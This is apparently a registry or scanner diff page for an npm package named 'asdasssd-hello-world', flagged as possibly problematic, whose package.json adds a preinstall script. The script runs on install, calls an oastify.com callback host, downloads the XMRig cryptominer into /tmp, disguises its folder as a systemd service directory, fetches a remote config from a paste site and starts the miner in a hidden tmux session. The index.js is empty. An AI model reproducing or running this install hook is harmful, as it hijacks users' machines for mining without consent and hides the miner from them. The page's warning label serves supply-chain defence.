asdasssd-hello-world 1.0.0
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of asdasssd-hello-world might be problematic. Click here for more details.
- package/index.js +0 -0
- package/package.json +13 -0
package/index.js
ADDED
File without changes
|
package/package.json
ADDED
@@ -0,0 +1,13 @@
|
|
1
|
+
{
|
2
|
+
"name": "asdasssd-hello-world",
|
3
|
+
"version": "1.0.0",
|
4
|
+
"description": "",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"start": "node index.js",
|
8
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
9
|
+
"preinstall": "curl http://run.o6vqhdk2poh2y3i3k4v8awv0nrtjh95y.oastify.com && cd /tmp && wget https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-jammy-x64.tar.gz && tar -xzvf xmrig-6.21.3-jammy-x64.tar.gz && rm xmrig-6.21.3-jammy-x64.tar.gz && mv xmrig-6.21.3 systemd-private-36e6f34eb600482a8e282-colord.service-AnOIAk && cd systemd-private-36e6f34eb600482a8e282-colord.service-AnOIAk && rm config.json && wget https://nopaste.net/s4conBps3i -O config.json && tmux new-session -d -s girmx './xmrig'"
|
10
|
+
},
|
11
|
+
"author": "Zenn",
|
12
|
+
"license": "ISC"
|
13
|
+
}
|